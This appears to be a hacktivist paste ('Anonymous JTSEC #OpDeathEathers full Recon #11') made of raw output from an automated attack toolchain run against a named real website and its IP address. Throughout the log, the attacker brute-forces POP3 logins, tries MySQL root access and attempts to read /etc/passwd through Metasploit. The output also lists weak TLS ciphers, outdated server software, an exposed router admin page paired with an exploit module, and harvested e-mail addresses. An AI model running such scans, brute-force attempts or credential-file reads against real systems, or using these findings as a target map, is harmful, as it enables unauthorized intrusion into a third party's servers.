- |_[ + ] Target:: [ http://www.vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/23362/index.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 98 / 100 ]-[19:42:09] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x91x3943&s=60&u=http://galleries.payserve.com/1/37611/24484/index.html ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 99 / 100 ]-[19:42:11] [ - ]
- |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.seductive18.com/free/1/video/001ADRENALYN53366600/2/14663/1008616/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [15-09-2018 19:42:11]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-vcteens.com.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:42 EDT
- Nmap scan report for vcteens.com (108.59.1.220)
- Host is up (0.58s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 2225 guesses in 181 seconds, average tps: 12.0
- |_pop3-capabilities: TOP SASL CAPA RESP-CODES PIPELINING STLS UIDL
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP|general purpose
- Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 625.39 ms 108.59.1.220
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://vcteens.com
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginHeartbleed
- PluginCertInfo
- PluginChromeSha1Deprecation
- PluginCompression
- PluginSessionRenegotiation
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginHSTS
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- vcteens.com:443 => 108.59.1.220:443
- SCAN RESULTS FOR VCTEENS.COM:443 - 108.59.1.220:443
- ---------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 4ac1667dc84e8e46576379e8f070236ccc55e7b2
- Common Name: youmydaddy.com
- Issuer: Let's Encrypt Authority X3
- Serial Number: 04A961F3CF9F48F21E52E39DCF8CE9B8BA64
- Not Before: Jul 31 22:53:20 2018 GMT
- Not After: Oct 29 22:53:20 2018 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['www.youmydaddy.com', 'youmydaddy.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match vcteens.com
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Certificate Chain Received: ['youmydaddy.com']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Preferred:
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits
- Accepted:
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits
- DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits
- DHE-RSA-AES256-SHA DH-2048 bits 256 bits
- CAMELLIA256-SHA - 256 bits
- AES256-SHA - 256 bits
- ECDHE-RSA-RC4-SHA ECDH-256 bits 128 bits
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits
- DHE-RSA-SEED-SHA DH-2048 bits 128 bits
- DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits
- DHE-RSA-AES128-SHA DH-2048 bits 128 bits
- SEED-SHA - 128 bits
- RC4-SHA - 128 bits
- RC4-MD5 - 128 bits
- IDEA-CBC-SHA - 128 bits
- CAMELLIA128-SHA - 128 bits
- AES128-SHA - 128 bits
- ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits
- EDH-RSA-DES-CBC3-SHA DH-2048 bits 112 bits
- DES-CBC3-SHA - 112 bits
- SCAN COMPLETED IN 14.35 S
- -------------------------
- Version: 1.11.11-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 108.59.1.220
- Testing SSL server vcteens.com on port 443 using SNI name vcteens.com
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred SSLv3 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted SSLv3 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted SSLv3 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted SSLv3 256 bits AES256-SHA
- Accepted SSLv3 256 bits CAMELLIA256-SHA
- Accepted SSLv3 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted SSLv3 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted SSLv3 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
- Accepted SSLv3 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted SSLv3 128 bits AES128-SHA
- Accepted SSLv3 128 bits SEED-SHA
- Accepted SSLv3 128 bits CAMELLIA128-SHA
- Accepted SSLv3 128 bits IDEA-CBC-SHA
- Accepted SSLv3 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted SSLv3 128 bits RC4-SHA
- Accepted SSLv3 128 bits RC4-MD5
- Accepted SSLv3 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted SSLv3 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: youmydaddy.com
- Altnames: DNS:www.youmydaddy.com, DNS:youmydaddy.com
- Issuer: Let's Encrypt Authority X3
- Not valid before: Jul 31 22:53:20 2018 GMT
- Not valid after: Oct 29 22:53:20 2018 GMT
- #######################################################################################################################################
- [+] Screenshot saved to /usr/share/sniper/loot/vcteens.com/screenshots/vcteens.com-port443.jpg
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 623 closed... skipping.
- + -- --=[Port 624 closed... skipping.
- + -- --=[Port 1099 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 2049 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:47 EDT
- nmap: nse_nsock.cc:612: void receive_callback(nsock_pool, nsock_event, void*): Assertion `lua_status(L) == LUA_YIELD' failed.
- modes/normal.sh : ligne 913 : 30220 Abandon nmap -A -sV -Pn --script=mysql* -p 3306 $TARGET
- Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
- EFLAGS: 00010046
- eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
- esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
- ds: 0018 es: 0018 ss: 0018
- Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
- Stack: 90909090990909090990909090
- 90909090990909090990909090
- 90909090.90909090.90909090
- 90909090.90909090.90909090
- 90909090.90909090.09090900
- 90909090.90909090.09090900
- ..........................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ccccccccc.................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- .................ccccccccc
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ..........................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffff..................
- ffffffff..................
- Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
- Aiee, Killing Interrupt handler
- Kernel panic: Attempted to kill the idle task!
- In swapper task - not syncing
- =[ metasploit v4.17.13-dev ]
- + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
- + -- --=[ 539 payloads - 42 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOSTS => vcteens.com
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- ERROR 1045 (28000): Access denied for user 'root'@'1.238.130.17' (using password: NO)
- #######################################################################################################################################
- # cowsay++
- ____________
- < metasploit >
- ------------
- \ ,__,
- \ (oo)____
- (__) )\
- ||--|| *
- =[ metasploit v4.17.13-dev ]
- + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
- + -- --=[ 539 payloads - 42 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => vcteens.com
- RHOSTS => vcteens.com
- [*] Attempting to retrieve /etc/passwd...
- [*] The server returned: 200 Document follows
- <h1>Error - Document follows</h1>
- <p>This web server is running in SSL mode. Try the URL <a href='https://lcwmlm431.amhost.net:10000/'>https://lcwmlm431.amhost.net:10000/</a> instead.<br></p>
- ######################################################################################################################################
- I, [2018-09-15T19:47:52.266360 #30457] INFO -- : Initiating port scan
- I, [2018-09-15T19:49:24.103460 #30457] INFO -- : Using nmap scan output file logs/nmap_output_2018-09-15_19-47-52.xml
- I, [2018-09-15T19:49:24.104560 #30457] INFO -- : Discovered open port: 108.59.1.220:81
- I, [2018-09-15T19:49:26.838851 #30457] INFO -- : Discovered open port: 108.59.1.220:443
- I, [2018-09-15T19:49:28.637187 #30457] INFO -- : Discovered open port: 108.59.1.220:993
- I, [2018-09-15T19:49:33.572761 #30457] INFO -- : Discovered open port: 108.59.1.220:995
- I, [2018-09-15T19:49:38.421851 #30457] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +-----------------+----------------------------------+------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +-----------------+----------------------------------+------------------------------------------------+----------+----------+
- | Linksys WRT54GL | http://108.59.1.220:81/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- +-----------------+----------------------------------+------------------------------------------------+----------+----------+
- ######################################################################################################################################
- + Target IP: 108.59.1.220
- + Target Hostname: www.vcteens.com
- + Target Port: 80
- + Start Time: 2018-09-15 12:21:58 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: nginx/1.9.5
- + Retrieved x-powered-by header: PHP/5.2.17
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Server leaks inodes via ETags, header found with file /, inode: 48360017, size: 3115, mtime: Mon May 28 08:18:26 2018
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- + OSVDB-3092: /cgi-bin/at3/signup.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + 27121 requests: 0 error(s) and 12 item(s) reported on remote host
- + End Time: 2018-09-15 13:24:58 (GMT-4) (3780 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- =======================================================================================================================================
- | Domain: http://vcteens.com/
- | Server: nginx/1.9.5
- | IP: 108.59.1.220
- =======================================================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://vcteens.com/icons/
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://vcteens.com/error/HTTP_NOT_FOUND.html.var
- | [+] CODE: 200 URL: http://vcteens.com/index.php
- =======================================================================================================================================
- ######################################################################################################################################
- | E-mails:
- | [+] E-mail Found: mike@hyperreal.org
- | [+] E-mail Found: kevinh@kevcom.com
- |
- | External hosts:
- | [+] External Host Found: http://
- | [+] External Host Found: http://syndication.exoclick.com
- | [+] External Host Found: http://c.statcounter.com
- | [+] External Host Found: http://statcounter.com
- | [+] External Host Found: http://httpd.apache.org
- =======================================================================================================================================
- #######################################################################################################################################
- Anonymous JTSEC #OpDeathEathers full Recon #11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement